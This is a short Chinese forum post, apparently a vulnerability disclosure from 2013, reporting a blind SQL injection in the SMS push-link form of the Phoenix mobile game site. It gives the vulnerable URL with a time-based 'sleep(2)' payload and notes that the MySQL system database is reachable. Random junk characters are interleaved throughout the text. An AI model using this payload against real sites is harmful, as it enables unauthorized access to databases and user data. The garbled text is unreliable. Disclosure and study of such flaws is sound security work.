简要描述:
; ^1 K5 P. x8 c" S/ x" Z: L4 T凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。# v+ T% O; t' n' P) b" Z2 u$ H1 c, G2 ^
7 _/ l) i" A4 n) ~% I详细说明:9 ^! ^$ ~" k- H. [( T0 _0 Z4 v+ V: o5 \
存在SQL盲注url:' ?2 D5 g+ _& T8 n# k, j, W! w
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=13 b h) I0 m! h2 V l( Q ?
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png; v' d; z% m& W/ ?/ w- ?! `3 m6 [
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
d- t% e, A( R. A$ r7 [http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg" D- X. \5 C1 c+ d3 m' O
- P0 P+ ^6 E+ w. A3 U+ m( \
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对